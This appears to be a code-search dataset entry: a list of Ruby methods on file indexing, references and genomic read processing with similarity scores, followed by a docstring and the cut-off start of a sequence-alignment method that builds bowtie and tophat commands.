"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def generate_index!(output_doc_path)\n result = ''\n\n ATTACK_API.techniques_by_tactic.each do |tactic, techniques|\n result += \"# #{tactic}\\n\"\n techniques.each do |technique|\n result += \"- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, true)}\\n\"\n ATOMIC_RED_TEAM.atomic_tests_for_technique(technique).each_with_index do |atomic_test, i|\n result += \" - Atomic Test ##{i+1}: #{atomic_test['name']}\\n\"\n end\n end\n result += \"\\n\"\n end\n\n File.write output_doc_path, result\n\n puts \"Generated Atomic Red Team index at #{output_doc_path}\"\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) or\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name, aai_medoids: \".aai-medoids.tsv\",\n haai_db: \".haai.db\", aai_db: \".aai.db\", ani_medoids: \".ani-medoids.tsv\",\n ani_db: \".ani.db\", ref_tree: \".nwk\", ref_tree_pdf: \".nwk.pdf\",\n intax_test: \".intax.txt\")\n end",
"def source_index \n @gsi = Gem::SourceIndex.from_gems_in(*Gem::SourceIndex.installed_spec_directories)\n end",
"def index_path\n @index_path ||= begin\n index_path = ENV['INDEX']\n index_path = Dir['indexes/*.json'].sort.last if index_path.blank?\n abort 'Need an INDEX=indexes/some_index.json' if index_path.blank?\n abort \"#{ index_path } is not a file\" unless File.file?(index_path)\n index_path\n end\nend",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def path_without_name_and_ref(path); end",
"def index_path(path)\n path ? path.chomp(File.extname(path)) + '.index' : nil\n end",
"def index\n @index ||= Gem::SourceIndex.from_gems_in File.join(path, \"specifications\")\n end",
"def open_index(o={})\n @clf = cache_data('clf', Searcher.load_features())\n @con_weights = cache_data('con_weights', Searcher.load_weights(CON_FEATURES, 'con', Conf.weight_con))\n @doc_weights = cache_data('doc_weights', Searcher.load_weights(DOC_FEATURES, 'doc', Conf.weight_doc))\n end",
"def get_correct_filename(annotation, files, submission)\n if annotation.position == -1\n # position -1 maps to the Autograder Output\n \"Autograder Output\"\n elsif files && !annotation.position.nil?\n # if the submission is an archive, use filename in archive;\n # otherwise, use submission filename\n Archive.get_nth_filename(files, annotation.position)\n else\n submission.filename\n end\n end",
"def after_build\n cleanup_nontarget_files\n run_help_indexer\nend",
"def indexing?\n File.exist?(@indexing)\n end",
"def offset_for (ref)\n @xref[ref.id][ref.gen]\n rescue\n raise InvalidObjectError, \"Object #{ref.id}, Generation #{ref.gen} is invalid\"\n end",
"def load_index_in(source, words, remaining_words, priority)\n return unless @index_file_name\n index_source = source.relative_child(@index_file_name)\n load_relevant_path(index_source, words, remaining_words, priority) if index_source\n end",
"def fetchAnnotations(dataDir, outDir, trainingTriples)\n relations = Set.new(trainingTriples.map{|triple| triple[Constants::RELATION]})\n\n entities = []\n trainingTriples.each{|triple|\n entities << triple[Constants::HEAD]\n entities << triple[Constants::TAIL]\n }\n entities = Set.new(entities)\n\n annotations = ReverbLoad.annotations(File.join(dataDir, Reverb::ANNOTATIONS_FILE_RELPATH))\n testSet = []\n\n # TEST\n=begin\n annotations = []\n File.open('test2.txt', 'r'){|file|\n file.each{|line|\n parts = line.split(\"\\t\").map{|part| part.strip().downcase().gsub(' ', '_')}\n valid = parts.shift() == '1'\n parts.shift()\n\n parts[1], parts[2] = parts[2], parts[1]\n\n annotations << [\n parts,\n valid,\n 1.0\n ]\n }\n }\n=end\n\n # Go backwards.\n rejectedCount = 0\n (0...(annotations.size())).to_a().reverse().each{|i|\n annotation = annotations[i]\n\n if (!entities.include?(annotation[0][Constants::HEAD]))\n puts \"Rejecting annotation because head (#{annotation[0][Constants::HEAD]}) is not a known entity.\"\n annotations.delete_at(i)\n rejectedCount += 1\n next\n end\n\n if (!entities.include?(annotation[0][Constants::TAIL]))\n puts \"Rejecting annotation because tail (#{annotation[0][Constants::TAIL]}) is not a known entity.\"\n annotations.delete_at(i)\n rejectedCount += 1\n next\n end\n\n if (!entities.include?(annotation[0][Constants::RELATION]))\n puts \"Rejecting annotation because relation (#{annotation[0][Constants::RELATION]}) is not a known relaiton.\"\n annotations.delete_at(i)\n rejectedCount += 1\n next\n end\n }\n\n puts \"Rejected #{rejectedCount} / #{annotations.size() + rejectedCount} annotations for unknown components.\"\n\n # Write out the full annotations for reference.\n File.open(File.join(outDir, Reverb::ANNOTATIONS_RAW_FILENAME), 'w'){|file|\n file.puts(annotations.map{|annotation| annotation.flatten().join(\"\\t\")}.join(\"\\n\"))\n }\n\n # Remove negative examples.\n annotations.delete_if{|annotation| !annotation[1]}\n\n return annotations.map{|annotation| annotation[0]}\nend",
"def build_indices\n @files, @classes = RDoc::Generator::Context.build_indices(@toplevels,\n @options)\n end",
"def build_indices\n @files, @classes = RDoc::Generator::Context.build_indices(@toplevels,\n @options)\n end",
"def getReferencePath()\n inputParams = BWAParams.new()\n inputParams.loadFromFile()\n @referencePath = inputParams.getReferencePath()\n\n if isEmptyOrNull(@referencePath)\n @referencePath = \"none\"\n end\n end",
"def annotate_header header, fname\n genome = genome_from_fname fname\n\n \"#{genome}____#{header}\"\n end",
"def init_all_paths_liby\n\t\tcv_set(Liby, :path_lily_file \t => nil)\n\t\tcv_set(Liby, :path_pdf_file \t => nil)\n\t\tcv_set(Liby, :path_ruby_score => nil)\t\t\t\n\t\tcv_set(Liby, :path_affixe_file => nil)\t\t\t\n end",
"def dotindex(path)\n file = File.join(path, '.index')\n File.file?(file) ? file : false\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless\n File.exist?(\"#{pref}/01.haai/#{name}.db\")\n r = MiGA::Result.new(\"#{base}.json\")\n r.add_files(haai_db: \"01.haai/#{name}.db\", aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\")\n r\n end",
"def phrender_index_file(index_file_path = nil)\n @phrender_index_file = index_file_path || @phrender_index_file\n end",
"def locate_internal_refs\n #require 'debug'; binding.b\n refs = gather_internal_refs\n #@files.keys.reject { |k| @files[k][:attachment] }.each do |identifier|\n @files.keys.reject { |k| @files.get(k,:attachment) }.each do |identifier|\n #id = @c.decode(@isodoc.docid_prefix(\"\", identifier.dup))\n #locate_internal_refs1(refs, identifier, @files[id])\n id = @isodoc.docid_prefix(\"\", identifier.dup)\n locate_internal_refs1(refs, identifier, id)\n end\n refs.each do |schema, ids|\n ids.each do |id, key|\n key == true and refs[schema][id] = \"Missing:#{schema}:#{id}\"\n end\n end\n refs\n end",
"def generate_ref(ref, index)\n ref_name = Google::StringUtils.underscore(ref.name)\n generate_object(ref, \"resource(#{ref_name},#{index})\", :resource,\n index, ensure: 'present')\n end",
"def index\n if params[:annot_id] and params[:cat_i]\n @annot = Annot.where(:id => params[:annot_id]).first\n @cat_i = params[:cat_i]\n @annot_cell_set = AnnotCellSet.where(:annot_id => params[:annot_id], :cat_idx => params[:cat_i].to_i).first\n @cell_set = CellSet.where(:id => @annot_cell_set.cell_set_id).first\n @project = @annot.project\n @version = @project.version\n @h_env = Basic.safe_parse_json(@version.env_json, {})\n # @cell_set = CellSet.where(:id => @annot).first\n @all_clas = Cla.where(#:project_id => @project.id, \n :cell_set_id => @cell_set.id #@annot_cell_set.cell_set_id\n #:annot_id => params[:annot_id], :cat_idx => params[:cat_idx].to_i\n ).all\n @h_cla_sources = {}\n ClaSource.all.map{|e| @h_cla_sources[e.id] = e}\n \n @h_votes = {}\n if current_user\n my_votes = ClaVote.where(:cla_id => @all_clas.map{|c| c.id}, :user_id => current_user.id).all\n my_votes.each do |v|\n @h_votes[v.cla_id] = v\n end\n #votes.map{|v| h_votes[v.user_id] = v} \n #h_my_votes[my_vote.id] = my_vote \n end\n @h_cots = {}\n @h_genes = {}\n tmp_cot_ids = []\n tmp_down_gene_ids = []\n tmp_up_gene_ids = []\n @all_clas.each do |cla|\n tmp_cot_ids |= cla.cell_ontology_term_ids.split(\",\").map{|e| e.to_i} if cla.cell_ontology_term_ids\n tmp_up_gene_ids |= cla.up_gene_ids.split(\",\").map{|e| e.to_i} if cla.up_gene_ids\n tmp_down_gene_ids |= cla.down_gene_ids.split(\",\").map{|e| e.to_i} if cla.down_gene_ids\n end\n\n @h_all_cla_votes = {}\n \n all_votes = ClaVote.where(:cla_id => @all_clas.map{|e| e.id}).all.to_a\n \n all_votes.each do |vote|\n @h_all_cla_votes[vote.cla_id]||=[]\n @h_all_cla_votes[vote.cla_id].push vote\n end\n\n if tmp_cot_ids.size > 0\n CellOntologyTerm.where(:id => tmp_cot_ids).all.each do |cot|\n @h_cots[cot.id] = cot\n end\n end\n \n tmp_gene_ids = tmp_up_gene_ids | tmp_down_gene_ids\n if @h_env\n tmp_genes = Basic.sql_query2(:asap_data, @h_env['asap_data_db_version'], 'genes', '', 'id, name, ensembl_id', \"id IN (\" + tmp_gene_ids.join(\",\") + \")\")\n tmp_genes.each do |gene|\n @h_genes[gene.id.to_i] = gene\n end\n end\n \n render :partial => 'index'\n else\n @clas = Cla.all\n render\n end\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def generate_index\n setup\n\n template_file = @template_dir + 'index.rhtml'\n return unless template_file.exist?\n\n debug_msg \"Rendering the index page...\"\n\n out_file = @base_dir + @options.op_dir + 'index.html'\n rel_prefix = @outputdir.relative_path_from out_file.dirname\n search_index_rel_prefix = rel_prefix\n search_index_rel_prefix += @asset_rel_path if @file_output\n\n asset_rel_prefix = rel_prefix + @asset_rel_path\n\n @title = @options.title\n\n render_template template_file, out_file do |io|\n here = binding\n # suppress 1.9.3 warning\n here.local_variable_set(:asset_rel_prefix, asset_rel_prefix)\n here\n end\n rescue => e\n error = RDoc::Error.new \\\n \"error generating index.html: #{e.message} (#{e.class})\"\n error.set_backtrace e.backtrace\n\n raise error\n end",
"def should_index_this_document?(complete_path)\n last_itime=index_time_dbm_file[complete_path]\n @from_scratch || !last_itime || File.mtime(complete_path)> Time._load(last_itime) \n end",
"def genome_annotation\n self.genome_assembly.present? ? self.genome_assembly.current_annotation : nil\n end",
"def do_local_indexing(solr_doc); end",
"def construct_index\n end",
"def preindex!\n reset_trie!\n @board.flatten.each_with_index do |_, index|\n #convert flat index to x,y coords\n pos = index.divmod(4)\n build_trie(@trie, @board, pos)\n end\n @trie\n end",
"def reproc_true(file)\n full_path = file\n if (! File.exists?(full_path))\n # Rubymatica.save_status(dir_uuid, \"Can't reprocess, #{full_path} does not exist.\")\n print \"Can't reprocess, #{full_path} does not exist.\\n\";\n exit\n end\n extract_flag = false\n dir_uuid = File.basename(full_path)\n \n # When reprocessing, the meta_data/info.db already exists (or else\n # this will fail), therefore we can look in the db for info such\n # as the name of this ingest.\n \n my_ig = Ingest.new(dir_uuid)\n \n base_name = my_ig.read_meta(\"ingest_name\")\n tub = \"#{Dest}/#{dir_uuid}/#{Accession_dir}\"\n \n Rubymatica.save_status(dir_uuid, \"Reprocessing #{Accession_dir} uuid: #{dir_uuid}\")\n \n igl_dest = \"#{Dest}/#{dir_uuid}/#{Ig_logs}\"\n pv_dir = \"#{Dest}/#{dir_uuid}/#{Pv}\"\n md_dir = \"#{Dest}/#{dir_uuid}/#{Meta}\"\n ac_dir = \"#{Dest}/#{dir_uuid}/#{Accession_dir}\"\n \n # Delete any previously machine created files. Keeping files\n # would mean using previously created file uuid's and that\n # would be a mess. This codes doesn't have the architecture\n # for that.\n\n # Use an anonymous array because we can. Directories that we'll\n # clean up, followed by a list of files we will *not* delete.\n\n [igl_dest, pv_dir, md_dir].each { |path|\n Find.find(path) { |file|\n if (file.match(Dcx) or \n file.match(Db_name))\n next;\n end\n\n # Great line of code. OOP totally rocks. Not! Class,\n # method and variable all the same name, and you thought\n # programmers didn't have a sense of humor.\n \n if (File.file?(file))\n File.delete(file)\n end\n }\n }\n return base_name,dir_uuid, my_ig, tub, igl_dest, pv_dir, md_dir, ac_dir, extract_flag\n end",
"def check_index_finder\n # Leave it alone\n end",
"def input_paths\n reads_from_elasticsearch? ? elasticsearch_hdfs_tmp_dir(input_index) : super()\n end",
"def prune_index\n missing_files=index_time_dbm_file.reject{|filename,itime| File.exists?(filename) && Picolena::IndexedDirectories.any?{|dir,alias_path| filename.starts_with?(dir)}}\n missing_files.each{|filename, itime|\n index.writer.delete(:complete_path, filename)\n index_time_dbm_file.delete(filename)\n logger.debug \"Removed : #{filename}\"\n }\n index.optimize\n end",
"def index\n # Block if this file is currently being indexed by another thread/process\n if indexing?\n while indexing?\n sleep 1\n end\n else\n self.indexing = true\n \n begin\n # Filter unparseable entries\n # TODO: Find a more efficient way to filter unparseable entries without\n # having to copy the entire file line by line\n filtered = 0\n File.open(@filtered_file, 'w') do |f|\n File.foreach(@data_file) do |line|\n begin\n parse(line)\n f.write line\n rescue\n filtered += 0\n end\n end\n end\n puts \"Filtered #{filtered} unparseable entries\" if filtered > 0 and ENV['DEBUG']\n \n # File must be sorted\n File.sort(@filtered_file, @sorted_file, \"-k#{@chr_col},#{@chr_col} -k#{@start_col},#{@start_col}n\")\n \n # and BGZipped\n BGZip.compress(@sorted_file, @bgzipped_file)\n \n # Now Tabix can index it\n Tabix.index(@bgzipped_file, @chr_col, @start_col, @end_col)\n rescue\n raise EntryFileError, \"Error indexing file #{File.basename(@data_file)} for lookup!\"\n ensure\n # Delete the temporary filtered and sorted files since they are unneeded\n File.delete(@filtered_file) if File.exist?(@filtered_file)\n File.delete(@sorted_file) if File.exist?(@sorted_file)\n self.indexing = false\n end\n end\n end",
"def annotate_one_file(file_name, info_block, position, options = T.unsafe(nil)); end",
"def test_keyword_index_builder\n CEdictImporter.create_headword_index\n end",
"def locate_internal_refs1(refs, identifier, ident)\n #file, _filename = targetfile(filedesc, read: true)\n file, _filename = @files.targetfile_id(ident, read: true)\n xml = Nokogiri::XML(file) { |config| config.huge }\n t = xml.xpath(\"//*/@id\").each_with_object({}) { |i, x| x[i.text] = true }\n refs.each do |schema, ids|\n ids.keys.select { |id| t[id] }.each do |id|\n n = xml.at(\"//*[@id = '#{id}']\") and\n n.at(\"./ancestor-or-self::*[@type = '#{schema}']\") and\n refs[schema][id] = identifier\n end\n end\n end",
"def improve_rast_genbank(input_gbk, output_gbk, task_name=\"improve_rast\")\n abort \"FATAL: Task #{task_name} requires specifying STRAIN_NAME\" unless STRAIN_NAME \n unless GENBANK_REFERENCES\n puts \"WARN: No GenBank references for re-annotation provided, skipping this step\"\n cp input_gbk, output_gbk\n return\n end\n \n # Once we want to integrate antibiotic resistance databases, we can start adding those in here\n # as improve_rast_gbk.rb supports them\n system <<-SH\n module load blast/2.2.26+\n ruby #{REPO_DIR}/scripts/improve_rast_gbk.rb \\\n #{GENBANK_REFERENCES.map{|f| Shellwords.escape f }.join(' ')} #{Shellwords.escape input_gbk}\\\n > #{Shellwords.escape output_gbk}\n SH\n end",
"def create_index_file\n return [] unless File.exist? path\n\n RelatonBib.parse_yaml File.read(path, encoding: \"UTF-8\"), [Symbol]\n end",
"def load_script_from_index\n lines = File.readlines(index_filename)\n path = ENV['ALTERNATIVE_PATH'] || '.'\n lines.each do |filename|\n require(File.join(path, filename.chomp))\n end\n end",
"def transform index_file\n @config_hash = YAML.load(ERB.new(File.read(@config_yml)).result(binding))\n InputBatch::Log.write_log \"Opened csv file for processing\"\n InputBatch::Log.write_log \"Batch type to load : #{facility.batch_load_type.upcase}\"\n\n @index_file_name = File.basename(index_file).downcase\n load_flag = true\n @corresp_flag = true\n @version = facility.index_file_parser_type.downcase.include?('_bank') ? 'BANK_OF_AMERICA' : 'GENERAL'\n begin\n @csv = CSV.read(index_file, :col_sep => config_hash['COL_SEP'] )\n rescue\n raise \">>>>>>>> Invalid index file.....\"\n end\n @type = call_parser_specific_method \"find_type\"\n @image_folder = Dir.glob(\"#{@location}/**/#{config['IMAGE']['image_folder']}*\", File::FNM_CASEFOLD)\n unless @image_folder.blank?\n @image_path = @image_folder.first.split('/')[0..-2].join('/')\n\n raise \"Image Folder Mismatch : Please check for folder (case insensitive)\n '#{config['IMAGE']['image_folder']}' in batch zip \" if @image_folder.blank?\n\n @image_ext =File.extname(@image_folder[0]).delete(\".\")\n end\n InputBatch::Log.write_log \">>>>>Index Transformation Starts \" + Time.now.to_s\n @jobs = []\n header_row = config[\"HEADER_ROW\"]\n csv.shift(header_row) #skipping rows upto header\n unless csv.blank?\n raise \">>>> Error in date field. Dates should be unique for all the batches\" unless unique_date?\n\n if (@sitecode == '00Q49' && type == 'CORRESP' && csv[0][config['IMAGE']['image_file_name']].to_s.strip =~ /^\\d+$/) # DAP Correspondence logic\n @single_image_batch = true\n current_job_image = image_folder.detect{|file| File.extname(file) =~ /^.[t,T][i,I][f,F]$/ }\n dir_name = File.dirname(current_job_image)\n file_name = File.basename(current_job_image).split('.').first\n @page_count = %x[identify #{current_job_image}].split(File.basename(current_job_image)).length-1 rescue nil\n system(\"tiffsplit #{current_job_image} #{dir_name}/#{file_name}\")\n end\n csv.each_with_index do |row, index|\n @row_index = index + 1\n @row = row\n if !@row[0].blank?\n load_flag = eval(\"InputBatch.is_#{type.downcase}_process(facility)\") if job_condition\n if load_flag\n InputBatch::Log.status_log.info \"**** Processing index file row #{@row_index} ****\"\n save_records if valid_record?\n end\n end\n end\n @inbound_file_information.associate_to_report_check_informations if !@inbound_file_information.blank?\n end\n InputBatch::Log.write_log \">>>>>Index Transformation Ends \" + Time.now.to_s\n\n end",
"def pdf_location\n \"/pdf/#{authoritative_ref}.pdf\" if File.exists? \"public/pdf1/#{authoritative_ref}.pdf\"\n end",
"def build_cmd_ref\n # Example id's: N3K-C3048TP-1GE, N3K-C3064PQ-10GE, N7K-C7009, N7K-C7009\n\n debug \"Product: #{@product_id}\"\n debug \"Files being used: #{@files.join(', ')}\"\n\n @files.each do |file|\n feature = File.basename(file).split('.')[0]\n debug \"Processing file '#{file}' as feature '#{feature}'\"\n feature_hash = load_yaml(file)\n if feature_hash.empty?\n debug \"Feature #{feature} is empty\"\n next\n end\n feature_hash = filter_hash(feature_hash)\n if feature_hash.empty?\n debug \"Feature #{feature} is excluded\"\n @hash[feature] = UnsupportedCmdRef.new(feature, nil, file)\n next\n end\n\n base_hash = {}\n if feature_hash.key?('_template')\n base_hash = CommandReference.hash_merge(feature_hash['_template'])\n end\n\n feature_hash.each do |name, value|\n fail \"No entries under '#{name}' in '#{file}'\" if value.nil?\n @hash[feature] ||= {}\n if value.empty?\n @hash[feature][name] = UnsupportedCmdRef.new(feature, name, file)\n else\n values = CommandReference.hash_merge(value, base_hash.clone)\n @hash[feature][name] = CmdRef.new(feature, name, values, file)\n end\n end\n end\n end",
"def lttfindex\n end",
"def indexing=(b)\n if b\n FileUtils.touch(@indexing)\n else\n begin\n File.delete(@indexing) if File.exist?(@indexing)\n rescue\n puts \"Error deleting indexing file\" if ENV['DEBUG']\n end\n end\n end",
"def create_index_file_for_gist(filepath_array)\n filepath_array\n .map { |x| \"- #{x.split('/').last}\" }\n .sort\n .join(\"\\n\")\n end",
"def reindex!\n indexed if generate_solr_index\n end",
"def rebuild_index\n aaf_index.rebuild_index\n end",
"def initialize (filename)\n @indexname = filename + \".index\" \n @data_f = File.open(filename, \"w\")\n @index_f = File.open(@indexname, \"w\") \n @cur_num = 0 \n @cur_pos = @data_f.pos # 0\n end",
"def refresh\n super do |modified|\n return unless modified\n @indexer.generate_index #TODO: update_index?\n end\n end",
"def load_index\n construct_index unless index_valid?\n open_index_file\n end",
"def index_one(book_name)\n\n file = File.open( @dir_path+book_name, \"r\")\n\n puts \"Indexing #{book_name}\"\n file.each_line do |line|\n words = line.split\n words.each do |word|\n word = word.gsub(/[;.\"\"...,()?!*]+/i, \"\").downcase\n @connection.query(\"INSERT INTO #{@table_name} (word, count) VALUES ('#{@connection.escape(word)}', 1) ON DUPLICATE KEY UPDATE count=count+1\")\n\n end\n end\n\n puts \"Indexed #{book_name}\"\n end",
"def _lex_index_offsets; end",
"def _lex_index_offsets; end",
"def _lex_index_offsets; end",
"def _lex_index_offsets; end",
"def pathSourceDoc\n\t\"./documentation/\"\nend",
"def update_index\n index_files = []\n index_files << upload(\"specs.4.8.gz\", specs_index)\n log \"Uploaded all specs index\"\n index_files << upload(\"latest_specs.4.8.gz\", latest_index)\n log \"Uploaded latest specs index\"\n index_files << upload(\"prerelease_specs.4.8.gz\", prerelease_index)\n log \"Uploaded prerelease specs index\"\n\n index_files.each do |file|\n tuf_repo.replace_file(file, 'targets/unclaimed', 'targets')\n end\n\n # For now assume all files are unclaimed\n pending_files = tuf_pending_store.pending\n pending_files.each do |file|\n puts \"Adding file: #{file.path}\"\n tuf_repo.add_file(file, 'targets/unclaimed', 'targets')\n end\n tuf_repo.publish!\n tuf_pending_store.clear(pending_files)\n end",
"def full_ref # rubocop:disable Metrics/AbcSize\n @full_ref ||= begin\n ref = \"#{refparts[:perfix]}#{refparts[:series]} #{refparts[:code]}\"\n ref += \"pt#{refparts[:prt]}\" if refparts[:prt] # long_to_short(refparts, \"prt\").to_s\n ref += \"ver#{refparts[:ver]}\" if refparts[:ver] # long_to_short(refparts, \"vol\").to_s\n ref += \"v#{refparts[:vol]}\" if refparts[:vol]\n ref\n end\n end",
"def autoindex(loc, switch = 'on')\n oputs <<-eos\n location #{loc} {\n autoindex #{switch};\n }\n eos\nend",
"def buildParentReadMeIndex\n x = 0\n fileOutArr = Array.new\n\n # Build list of reference pages\n fileOutArr.push \"### Fn Command Reference\\n\\n\"\n @cmdListArr.each do |command|\n # Add each command to output\n fileOutArr.push \"[\" + command + \"](ref/\" + @fileNameArr[x] + \".md\" + \") \\n\"\n x = x + 1 # Counter for syncing arrays\n end\n \n # Add Fn Version\n fileOutArr.push(\"\\n<sub>\" + @fnVersion + \"</sub>\")\n\n\n # Write REFLIST.md file to disk\n puts \"Writing: \" + \"REFLIST\" + \".md\"\n File.open(\"REFLIST.md\", \"w\") do |f|\n f.puts(fileOutArr)\n end\n\n end"
] |
[
"0.55707574",
"0.5537845",
"0.52282965",
"0.5211746",
"0.514618",
"0.5114455",
"0.50818527",
"0.5056654",
"0.504273",
"0.50184566",
"0.50184566",
"0.49482235",
"0.4944961",
"0.49263582",
"0.48924422",
"0.48880744",
"0.48818028",
"0.48589686",
"0.48510918",
"0.48327085",
"0.476794",
"0.4767461",
"0.47097993",
"0.47094783",
"0.47056365",
"0.4700083",
"0.46883032",
"0.46786386",
"0.46696615",
"0.46692318",
"0.466867",
"0.4667478",
"0.46673572",
"0.4657162",
"0.46505302",
"0.4650467",
"0.46366543",
"0.46175605",
"0.46168017",
"0.46162638",
"0.4606074",
"0.45994556",
"0.45965457",
"0.45950547",
"0.45877334",
"0.45870924",
"0.45635754",
"0.4559753",
"0.45565984",
"0.4554373",
"0.4554373",
"0.45506942",
"0.4550126",
"0.4538813",
"0.45317072",
"0.4519073",
"0.45189765",
"0.4518386",
"0.45147488",
"0.4509108",
"0.44951054",
"0.44951054",
"0.44915035",
"0.449025",
"0.44901064",
"0.44829196",
"0.44805562",
"0.44772267",
"0.44750908",
"0.44704145",
"0.44628236",
"0.4456697",
"0.44562846",
"0.4454698",
"0.44521835",
"0.44453028",
"0.4440797",
"0.4437238",
"0.443604",
"0.4429437",
"0.4425258",
"0.4424632",
"0.4422372",
"0.4418305",
"0.441819",
"0.44133627",
"0.4413159",
"0.4410262",
"0.4408414",
"0.44044337",
"0.4402443",
"0.43950605",
"0.43950605",
"0.43950605",
"0.43950605",
"0.43935505",
"0.43927315",
"0.43913174",
"0.43848562",
"0.43831405"
] |
0.6362013
|
0
|
Performs alignment. ref: path to genomic reference; ref_base: path to reference without file extension; software: alignment software (bowtie1, bowtie2, bwa, star, tophat); opts: step-specific options, where :annotation is the path to the genomic annotation, :mismatches is the max number of mismatches in alignment, :seedlen is the seed length for ncRNA alignment, and :tophat_aligner is the software that tophat uses (bowtie1 / 2). Returns the names of the files containing mapped and unmapped reads
|
def align(ref, ref_base, software, opts = {})
if software == :tophat
bt_flag =
opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''
gap_flag =
opts[:mismatches] < 2 ? "--read-gap-length #{opts[:mismatches]}" : ''
end
aln_cmd = {
bowtie1:
'bowtie' \
" --seedlen=#{opts[:seedlen]} #{ref_base}" \
" --un=#{@names.get('fp')}" \
" -q #{@names.get('trim')} " \
" --sam #{@names.get('ncrna')}",
bowtie2:
'bowtie2' \
" --un #{@names.get('fp')}" \
" -x #{ref_base}" \
" -L #{opts[:seedlen]}" \
